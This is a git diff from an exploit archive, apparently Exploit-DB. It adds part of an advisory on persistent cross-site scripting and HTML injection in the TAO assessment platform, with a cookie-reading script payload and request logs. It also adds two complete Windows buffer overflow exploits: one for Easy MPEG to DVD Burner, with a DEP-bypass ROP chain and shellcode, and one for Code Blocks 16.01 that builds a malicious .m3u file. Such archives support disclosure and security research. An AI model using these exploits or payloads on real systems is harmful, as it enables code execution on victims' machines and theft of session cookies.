+http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userRoles_9=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_DeliveryRole&
+classUri=http_2_www_0_tao_0_lu_1_Ontologies_1_TAOSubject_0_rdf_3_Subject&uri=http_2_localhost_1_tao_0_rdf_3_i1586957152301539
+&password2=<img src="https://www.evolution-sec.com/evosec-logo.png">
+&password3=<img src="https://www.evolution-sec.com/evosec-logo.png">
+-
+POST: HTTP/1.1 200 OK
+Server: Apache/2.4.38 (Win32) PHP/7.2.15
+X-Powered-By: PHP/7.2.15
+Set-Cookie: tao_0855799=a4dd4f04e0f27648dcd6ee3e966cdb380d511079; path=/
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+
+Reference(s):
+http://localhost:89/tao/Users/edit
+http://localhost:89/tao/Main/index
+
+
+
+1.2
+The persistent cross site scripting web vulnerability can be exploited
+by remote attackers with privileged user account with low user interaction.
+For security demonstration or to reproduce the cross site scripting web
+vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open and login to the tao application
+2. Move into the test module on top
+3. Add new Rubric Block
+4. Inject script code test payload into the text label content input field
+5. Save the entry and move on the right site to activate
+6. The click on activate includes and executes the content immediatly
+7. Succesful reproduce of the cross site scripting vulnerability!
+
+
+PoC: Vulnerable Source
+<div class="rubricblock-content"><div>asd>"><span
+data-serial="img_l9lmylhuv8hf55xo9z264n"
+class="widget-box widget-inline widget-img" data-qti-class="img"
+contenteditable="false">
+<img data-serial="img_l9lmylhuv8hf55xo9z264n" data-qti-class="img"
+src="" alt="" style=""
+width="100%"></span> <img data-serial="img_rxephz0lwthtejgsndo2f3"
+data-qti-class="img" src="evil.source" alt="" style="">&nbsp;
+>"<script>alert(document.cookie)></script></div></iframe></div></div>
+</li></ol>
+
+
+PoC: Payload
+"<script>alert(document.cookie)></script>
+
+
+--- PoC Session Logs [POST] ---
+http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612
+Host: localhost:89
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 9664
+Origin: http://localhost:89
+Connection: keep-alive
+Referer:
+http://localhost:89/tao/Main/index?structure=tests&ext=taoTests&section=authoring
+Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
+tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
+model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI
+Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[],
+"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[],
+"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false,
+"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
+1","visible":true,
+"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[],
+"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
+"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,
+"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[],
+"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses":
+false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
+1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true,
+"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef",
+"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},
+{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[],
+"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl
+":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories"
+:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[],
+"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":
+"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6",
+"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
+"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
+"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
+"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"<script>alert(document.cookie)></script>",
+"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"},
+"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No
+outcome processing.
+Erase the existing rules, if
+any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}}
+-
+POST: HTTP/1.1 200 OK
+Server: Apache/2.4.38 (Win32) PHP/7.2.15
+X-Powered-By: PHP/7.2.15
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Security-Policy: frame-ancestors 'self'
+Content-Length: 14
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: application/json; charset=UTF-8
+-
+http://localhost:89/tao/Main/evil.source
+Host: localhost:89
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: image/webp,*/*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer:
+http://localhost:89/tao/Main/index?structure=tests&ext=taoTests&section=authoring
+Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
+tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.38 (Win32) PHP/7.2.15
+X-Powered-By: PHP/7.2.15
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 169
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+
+Security Risk:
+==============
+1.1
+The security risk of the html inject web vulnerability in the
+web-application is estimated as medium.
+
+1.2
+The security risk of the persistent cross site scripting web
+vulnerability in the web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/windows/local/48339.py b/exploits/windows/local/48339.py
new file mode 100755
index 000000000..355fbea67
--- /dev/null
+++ b/exploits/windows/local/48339.py
@@ -0,0 +1,150 @@
+# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)
+# Date: 2020-04-15
+# Exploit Author: Bailey Belisario
+# Tested On: Windows 7 Ultimate x64
+# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe
+# Version: 1.7.11
+# Exploit Length: 1015 Bytes
+# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode)
+
+# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow 
+# Exploit used with Python2.7
+#------------------------------------------------------------------------------------------------------------------------------------#
+# Bad Characters: \x00\x0a\x0d                                                                                                        #
+# SEH Offset: 1012                                                                                                                   #
+# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe                                                             #
+#------------------------------------------------------------------------------------------------------------------------------------#
+
+# Register setup for VirtualProtect() (Bypass DEP) :
+#---------------------------------------------------
+# EAX = Points to PUSHAD at time VirtualProtect() is called
+# ECX = lpflOldProtect (0x10047d30 as writable location)
+# EDX = flNewProtect(0x40)
+# EBX = dwSize (0x92)
+# ESP = lpAddress (automatic)
+# EBP = ReturnTo (ptr to jmp esp)
+# ESI = ptr to VirtualProtect()
+# EDI = ROP NOP (RETN)
+
+import struct
+
+def create_rop_chain():
+
+    rop_gadgets = [
+      
+      # Put 1 in EDX and decrement to 0
+      0x10031752,  # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
+      0x1003629a,  # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN
+      0x11111111,  # Filler
+
+      # Pop the pointer of VirtualProtect into EAX 
+      0x10037b12,  # POP EAX # RETN
+      0x1003b268,  # ptr to &VirtualProtect() [IAT SkinMagic.dll]
+
+      # Dereference Pointer into EDX then move back to EAX
+      0x1001c011,  # ADD EDX,DWORD PTR [EAX] # RETN 0x0C
+      0x10031772,  # MOV EAX,EDX # RETN
+      0x11111111,  # Filler
+      0x11111111,  # Filler
+      0x11111111,  # Filler
+
+      # Push VP and pop into EBP
+      0x1002e17b,  # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C
+      0x10037b12,  # POP EAX # RETN
+      0x11111111,  # Filler
+      0x11111111,  # Filler
+      0x11111111,  # Filler
+
+      # Use this to get to address needed to Pop VP into ESI
+	    0x1003619e,  # POP EAX # POP ESI # RETN
+
+	    # Move VP to +12 on stack then push the POP POP RETN
+      0x10032485,  # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN
+      0x11111111,  # Filler popped
+      0x11111111,  # Filler popped
+
+      # Set ESI to VP
+      0x1002e1ce,  # POP ESI # RETN [SkinMagic.dll] 
+      0x11111111,  # Where VP is MOV into 
+
+	    # Set EBP with POP EBP RETN
+      0x1002894f,  # POP EBP # RETN [SkinMagic.dll] 
+      0x1002894f,  # skip 4 bytes [SkinMagic.dll]
+
+      # Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F)
+      # Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40
+      0x10031752,  # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
+ 	    0x10037b12,  # POP EAX # RETN
+ 	    0x1005a0a0,  # Address of 3F
+ 	    0x10026173,  # ADD EDX,DWORD PTR [EAX] # RETN
+
+ 	    # Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers
+ 	    # Note: This should be at least length of shellcode
+ 	    0x100362c6,  # XOR EAX,EAX # RETN
+	    0x10033fb2,  # ADD AL,0C9 # RETN
+	    0x10033fb2,  # ADD AL,0C9 # RETN
+	    0x10035c12,  # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN
+     
+      # Set ECX to writable location
+      0x1003603f,  # POP ECX # RETN [SkinMagic.dll] 
+      0x10047d30,  # &Writable location [SkinMagic.dll]
+      
+      # Set EDI to ROP NOP
+      0x100395c2,  # POP EDI # RETN [SkinMagic.dll] 
+      0x10032982,  # RETN (ROP NOP) [SkinMagic.dll]
+      
+      # Do PUSHAD and be 1337
+      0x10037654,  # POP EAX # RETN 
+      0xa140acd2,  # CONSTANT
+      0x100317c8,  # ADD EAX,5EFFC883 # RETN 
+      0x1003248d,  # PUSH EAX # RETN
+
+      # Used to jump to ESP
+      0x1001cc57,  # ptr to 'push esp # ret ' [SkinMagic.dll]
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+ropChain = create_rop_chain()
+
+# CALC.EXE for POC
+shell = ("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
+         "\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F"
+         "\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
+         "\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45"
+         "\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7")
+
+# 148 Bytes needed to return to ROP CHAIN
+paddingBeginning = "B"*148
+
+# NOP Sled needs to be sufficient length, from some math, I came out with a buffer of 444 - len(ROP CHAIN)  
+nopLen = 444 - len(ropChain)
+nopSled = '\x90'*nopLen
+
+# Padding to SEH needs to consider the 420 bytes remaining - shellcode
+paddingMiddleLen = 420 - len(shell)
+paddingMiddle = 'B'*paddingMiddleLen
+
+# 0x004043ee (add esp, 7D4) Stack Pivot 2004 bytes
+# This brings total bytes to SEH Offset (1012) + 3 for a total of 1015 bytes
+seh = "\xee\x43\x40"
+
+# Exploit Visualization  #
+#------------------------#
+#  BBBBBBBBBBBBBBBBBBBB  #
+#------------------------#
+#       ROP CHAIN        #
+#------------------------#
+#          NOPS          #
+#------------------------#
+#       SHELL CODE       #
+#------------------------#
+#  BBBBBBBBBBBBBBBBBBBB  #
+#------------------------#
+#          SEH           #
+#------------------------#
+
+exploit = paddingBeginning + ropChain + nopSled + shell + paddingMiddle + seh
+
+file = open("pwn.txt", 'w')
+file.write(exploit)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48344.py b/exploits/windows/local/48344.py
new file mode 100755
index 000000000..0fae1bb8c
--- /dev/null
+++ b/exploits/windows/local/48344.py
@@ -0,0 +1,31 @@
+# Exploit Title: Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE
+# Date: 2020-04-17
+# Exploit Author: T3jv1l
+# Software Link: https://sourceforge.net/projects/codeblocks/files/Binaries/16.01/Windows/codeblocks-16.01-setup.exe
+# Software version: 16.01
+
+
+buffer="A"*536	#buffer
+buffer+="\x61\x41"	#POPAD + Aligned
+buffer+="\xF2\x41"	#POP/POP/RET
+
+#----------------------Align the eax to point to the shellcode PART -----------------------
+#buffer+="\x90"	#NOP
+#buffer+="\x6e"	#venetian padding
+#buffer+="\x05\x37\x13"	#add eax, 0x13003700
+#buffer+="\x6e"
+#buffer+="\x2d\x36\x13"	#sub eax, 0x13003600
+#buffer+="\x6e"	#venetian padding
+#buffer+="\x50"	#push eax
+#buffer+="\x6e"	#Venetian padding
+#buffer+="\xc3"	#ret
+
+#----------------------Shellcode PlaceHOLDER ----------------------------------------------
+#uffer+="\x90"*111
+#buffer+=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIX52KPKPM01PDIJEP1Y0QT4KPPNPTK1BLLTK1BMDDKSBNHLO6WPJNFNQKOVLOLC13LM2NLO07QXOLMKQ7WJBZR220WDKQBN0TKOZOLTKPLN1T8ZCOXKQZ10QTKQIMPKQXSTKOYLXISOJ19TKNTTKM1XV01KOFL7Q8OLMKQGW08YPD5L6KSSMJXOKSMMTBU9TPXDKR8MTKQYCRF4KLLPKTKPXMLKQJ3TKKTDKKQZ0E9OTMTO4QK1K1Q291JPQKO9PQOQOQJTKN2JKDM1MRJKQ4M3UGBKPM0M0R0RHNQTKRO4GKOXUWKL0VU6BPVQXVFDU7MUMKO9EOLM63LLJE0KKYP2UM5WKOWN3T2RORJKP1CKOJ5BCS1RL33NNS5RX2EKPA")
+buffer+="\xcc\xcc\xcc\xcc"
+buffer+="\x90"*(5000-len(buffer))
+f=open('exploit.m3u','w');
+f.write(buffer);
+f.close();
+print "[+] File created."
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ef5c6af48..a000a46d8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11030,6 +11030,8 @@ id,file,description,date,author,type,platform,port
 48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
 48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
 48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
+48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
+48344,exploits/windows/local/48344.py,"Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE",2020-04-17,T3jv1l,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18100,6 +18102,7 @@ id,file,description,date,author,type,platform,port
 48335,exploits/php/remote/48335.rb,"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)",2020-04-16,Metasploit,remote,php,
 48336,exploits/windows/remote/48336.rb,"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,windows,
 48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple,
+48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42578,3 +42581,6 @@ id,file,description,date,author,type,platform,port
 48326,exploits/php/webapps/48326.txt,"DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting",2020-04-15,"Vulnerability Research Laboratory",webapps,php,
 48327,exploits/ios/webapps/48327.txt,"File Transfer iFamily 2.1 - Directory Traversal",2020-04-15,Vulnerability-Lab,webapps,ios,
 48328,exploits/php/webapps/48328.txt,"Xeroneit Library Management System 3.0 - 'category' SQL Injection",2020-04-15,"Sohel Yousef",webapps,php,
+48340,exploits/ios/webapps/48340.txt,"Playable 9.18 iOS - Persistent Cross-Site Scripting",2020-04-17,Vulnerability-Lab,webapps,ios,
+48341,exploits/php/webapps/48341.txt,"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection",2020-04-17,Vulnerability-Lab,webapps,php,
+48342,exploits/hardware/webapps/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",webapps,hardware,